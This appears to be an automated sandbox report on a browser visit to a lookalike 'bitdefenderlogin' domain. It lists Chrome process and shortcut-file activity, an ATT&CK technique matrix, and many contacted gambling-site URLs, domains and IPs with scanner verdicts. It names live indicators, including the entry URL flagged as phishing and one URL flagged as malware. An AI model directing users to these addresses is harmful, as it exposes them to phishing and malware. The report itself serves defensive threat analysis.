Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://www.bitdefenderlogin.com/8%VirustotalBrowse
http://www.bitdefenderlogin.com/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ipinfo.io/0%URL Reputationsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_bg.png0%Avira URL Cloudsafe
https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=17175807493440%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/02.png0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/fiximg/ac-20200404/fileupload/uy09/202308/202308232137499.jpg0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_90_at2_017.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_03.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_ob.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_60_7003.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/index/383/hot/game_line.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/video/sunbet_h.jpg0%Avira URL Cloudsafe
about:blank0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/menu.js0%Avira URL Cloudsafe
https://2hsuoj.eveday.me/ftl/commonPage/js/layer.js0%Avira URL Cloudsafe
https://www.image110.com/uploads/e64e3b88ee0477d975ecd1b4e3ba5d63.gif0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/indexFooter.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_bg.png0%Avira URL Cloudsafe
https://2hsuoj.eveday.me/ftl/commonPage/js/layer.js0%VirustotalBrowse
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_49_12.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/headerTip.js0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/fserver/files/gb/1768/carousel/10007/1703760315829.jpg)0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/05.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/app/06.png0%Avira URL Cloudsafe
https://ocsapi-lc.tingmeikj.com/zb-cloud/pwv/sn.settings.get0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/analysis.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/382/service/img_logo.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/menuSubA.js0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/fiximg/ac-20200404/fileupload/uy09/202308/202308232135487.jpg0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/fish_tp-8.png0%Avira URL Cloudsafe
http://ia.51.la/go1?id=21771885&rt=1717972828951&rl=1280*1024&lang=en-US&ct=unknow&pf=1&ins=1&vd=1&ce=1&cd=24&ds=&ing=2&ekc=&sid=1717972828951&tt=%25E6%2589%2593%25E9%25B1%25BC%25E6%25AD%25A3%25E8%25A7%2584%25E5%25B9%25B3%25E5%258F%25B0%25E5%258F%25AF%25E6%258F%2590%25E7%258E%25B0-%25E4%25B8%25AD%25E5%259B%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2588%2586%25E5%2585%25AC%25E5%258F%25B8&kw=&cu=http%253A%252F%252Fwww.bitdefenderlogin.com%252Fhome.php&pu=0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/casinoico.png0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_ky.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_more.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/menu.js0%Avira URL Cloudsafe
https://js588.app0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232156138.jpg0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-10.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/bwin1768/themes/style/common.css0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_nwg.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_fg.png0%Avira URL Cloudsafe
https://x551005.com/ftl/commonPage/images/partner/partner-hongtu-white.png100%Avira URL Cloudmalware
https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_slot.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/index/383/login/password_n.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_xy.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/js/idangerous.swiper.min.js0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685-otherConf-js.js0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/index/383/hot/dot_n.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/cc.png?r=86902666960%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/importPassword.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/game/logo_fish.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_astar_w.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv8.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/fish_tp-10.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/loginByMobile.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/footer/new/footer_gray_01.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_wm.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/dialBack.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/inside.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/game/02_1.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_3sing.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_60_7002.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/footerNav.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232204130.png0%Avira URL Cloudsafe
https://wy-ali.meriksenrusso.com0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_04.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_88_kk8nqm3cfwtng.pn0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/382/footer/icon_service.png0%Avira URL Cloudsafe
https://www.image110.com/uploads/c0c87060c0d0344dc06ac6961604f1dd.jpg0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_redtiger.png0%Avira URL Cloudsafe
https://f21714.com/favicon.ico0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_bg.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_nwg.png0%Avira URL Cloudsafe
https://www.image110.com/uploads/0d303c466e9780aea6baef1054bb361c.gif0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_49_13.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_sbo_w.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/js/jquery/jquery.super-marquee.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10082.png0%Avira URL Cloudsafe
https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_lg.png0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/sport_im_w.png0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_154_SFG_WDGoldenFor0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/240516-03/static/js/vendor.js0%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/commonPage/images/api_logo/logo_fb.png0%Avira URL Cloudsafe
https://brhrjf.yuhu06.xyz/ftl/commonPage/js/jquery/jquery-1.11.3.min.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/06.png0%Avira URL Cloudsafe
https://brhrjf.yuhu06.xyz/ftl/commonPage/js/websocket/PopUp.js0%Avira URL Cloudsafe
https://zb-hw.czwygs.com/pc/image-pc/index/382/triangle.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/logo.js0%Avira URL Cloudsafe
https://e933002.com/favicon.ico0%Avira URL Cloudsafe
https://cstaticdun.126.net/load.min.js?t=17179729058420%Avira URL Cloudsafe
https://8vpfnx.eveday.me/ftl/resource/chess/public/game/game01/2x/i18n/game_fish_10_38003.png0%Avira URL Cloudsafe
https://brhrjf.yuhu06.xyz/ftl/bet365-1761/images/index/collabor_7.png0%Avira URL Cloudsafe
https://zb1-hw.qectyoua.com/pc/lib/jquery.min-1.9.1.js0%Avira URL Cloudsafe
https://e933002.com/message_zh_CN.js?v=17175807493440%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
dcr053r0lmcyq.cloudfront.net
3.165.113.62
truefalse
    unknown
    ocsapi1961.hydqef.com.w.cdngslb.com
    47.246.46.248
    truefalse
      unknown
      www.bitdefenderlogin.com
      156.225.145.162
      truefalse
        unknown
        jh03-site-15.cdn-ng.net
        103.24.53.62
        truefalse
          unknown
          d1o41tonhrxnzj.cloudfront.net
          18.245.199.58
          truefalse
            unknown
            jh03-site-18.cdn-ng.net
            103.117.134.21
            truefalse
              unknown
              wns732.cc
              202.61.87.224
              truefalse
                unknown
                js326.cc
                202.61.87.224
                truefalse
                  unknown
                  856217.cc
                  103.24.53.33
                  truefalse
                    unknown
                    e933002.com
                    38.174.148.234
                    truefalse
                      unknown
                      cstaticdun.126.net.w.kunluncan.com
                      163.181.92.226
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          unknown
                          x551005.com
                          38.174.148.43
                          truefalse
                            unknown
                            l5.gslb.ksyuncdn.com
                            183.61.243.1
                            truefalse
                              unknown
                              www.image110.com
                              103.85.191.78
                              truefalse
                                unknown
                                hg679.cc
                                202.61.87.219
                                truefalse
                                  unknown
                                  xpj723.cc
                                  202.61.87.224
                                  truefalse
                                    unknown
                                    www.google.com
                                    142.250.186.36
                                    truefalse
                                      unknown
                                      43370d.top
                                      38.174.148.16
                                      truefalse
                                        unknown
                                        wssa-301.shiwanxin.com.cdn20.com
                                        163.171.137.177
                                        truetrue
                                          unknown
                                          yh8613.cc
                                          202.61.87.219
                                          truefalse
                                            unknown
                                            t2391.cc
                                            202.61.87.224
                                            truefalse
                                              unknown
                                              d399221.top
                                              38.174.148.233
                                              truefalse
                                                unknown
                                                www.698jbwad.com
                                                103.234.73.28
                                                truefalse
                                                  unknown
                                                  js.users.51.la.w.cdngslb.com
                                                  163.181.92.245
                                                  truefalse
                                                    unknown
                                                    36s0iija.slt.sched.intlscdn.com
                                                    54.150.37.130
                                                    truefalse
                                                      unknown
                                                      stt-wasm.ai4funs.com
                                                      188.114.97.3
                                                      truefalse
                                                        unknown
                                                        wssa-381.moceand.com.cdn20.com
                                                        163.171.137.177
                                                        truetrue
                                                          unknown
                                                          f21714.com
                                                          38.174.148.2
                                                          truefalse
                                                            unknown
                                                            d7xy0886tqf1j.cloudfront.net
                                                            18.66.147.55
                                                            truefalse
                                                              unknown
                                                              offline.specialcdnstatus.com
                                                              169.254.254.254
                                                              truefalse
                                                                unknown
                                                                static.meiqia.com.wswebpic.com
                                                                163.171.128.148
                                                                truefalse
                                                                  unknown
                                                                  wssa-341.dalianjrkj.com.cdn20.com
                                                                  163.171.137.177
                                                                  truetrue
                                                                    unknown
                                                                    hcdnw.ovc.sme.cdnhwccmz121.com
                                                                    90.84.161.22
                                                                    truefalse
                                                                      unknown
                                                                      53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.com
                                                                      110.42.7.114
                                                                      truefalse
                                                                        unknown
                                                                        zcmcm.v.trpcdn.net
                                                                        154.85.69.2
                                                                        truefalse
                                                                          unknown
                                                                          l7pmnx802xd4h452.aliyunddos0015.com
                                                                          170.33.9.227
                                                                          truefalse
                                                                            unknown
                                                                            edge-api.meiqia.com.acc.edgeonedy1.com
                                                                            43.175.135.229
                                                                            truefalse
                                                                              unknown
                                                                              _1066._https.appiso-ty.souzhanzx.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                _1986._https.wssa-381.moceand.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  static.meiqia.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    ocsapi-aws.bakeddove.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      _1186._https.wssa-301.shiwanxin.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        ocsapi-aka.blackkhaki918.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          ocsapi1961.hydqef.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            wssa-301.shiwanxin.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              wssa-371.laorrey.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                wssa-381.moceand.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  8vpfnx.eveday.me
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    edge-api.meiqia.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      unknown
                                                                                                      _1886._https.wssa-371.laorrey.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        brhrjf.yuhu06.xyz
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          cstaticdun.126.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            api.tongjiniao.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              2hsuoj.eveday.me
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                ocsapi1961.wwwbyfen.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  unknown
                                                                                                                  ocsapi-lc.tingmeikj.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    zb-hw.czwygs.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      zb1-hw.qectyoua.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        _8066._https.appiso-ty.zvbzjsb.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          ia.51.la
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            wssa-341.dalianjrkj.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              js.users.51.la
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                zb-qq.gzjqwlkj.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  ocsapi-aws.huayidm.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    appiso-ty.souzhanzx.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      ahd-ocssn.qqxgo.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        appiso-ty.zvbzjsb.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          _1586._https.wssa-341.dalianjrkj.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                            https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1717580749344false
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_bg.pngfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/02.pngfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://zb-qq.gzjqwlkj.com/fiximg/ac-20200404/fileupload/uy09/202308/202308232137499.jpgfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_03.pngfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://yh8613.cc/default.htmlfalse
                                                                                                                                              unknown
                                                                                                                                              https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_ob.pngfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/image-pc/video/sunbet_h.jpgfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb1-hw.qectyoua.com/pc/image-pc/index/383/hot/game_line.pngfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              about:blankfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/menu.jsfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://2hsuoj.eveday.me/ftl/commonPage/js/layer.jsfalse
                                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.image110.com/uploads/e64e3b88ee0477d975ecd1b4e3ba5d63.giffalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/indexFooter.jsfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_bg.pngfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/headerTip.jsfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://zb-hw.czwygs.com/pc/image-pc/index/312/app/06.pngfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://ocsapi-lc.tingmeikj.com/zb-cloud/pwv/sn.settings.getfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://e933002.com/false
                                                                                                                                                unknown
                                                                                                                                                https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/05.pngfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://t2391.cc/default.htmlfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://js326.cc/default.html#/false
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/analysis.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/index/382/service/img_logo.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/240516-03/static/js/components/menuSubA.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-qq.gzjqwlkj.com/fiximg/ac-20200404/fileupload/uy09/202308/202308232135487.jpgfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/fish_tp-8.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://ia.51.la/go1?id=21771885&rt=1717972828951&rl=1280*1024&lang=en-US&ct=unknow&pf=1&ins=1&vd=1&ce=1&cd=24&ds=&ing=2&ekc=&sid=1717972828951&tt=%25E6%2589%2593%25E9%25B1%25BC%25E6%25AD%25A3%25E8%25A7%2584%25E5%25B9%25B3%25E5%258F%25B0%25E5%258F%25AF%25E6%258F%2590%25E7%258E%25B0-%25E4%25B8%25AD%25E5%259B%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2588%2586%25E5%2585%25AC%25E5%258F%25B8&kw=&cu=http%253A%252F%252Fwww.bitdefenderlogin.com%252Fhome.php&pu=false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/casinoico.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_ky.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_more.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/menu.jsfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232156138.jpgfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-10.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://8vpfnx.eveday.me/ftl/bwin1768/themes/style/common.cssfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/card_nwg.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_fg.pngfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://x551005.com/ftl/commonPage/images/partner/partner-hongtu-white.pngfalse
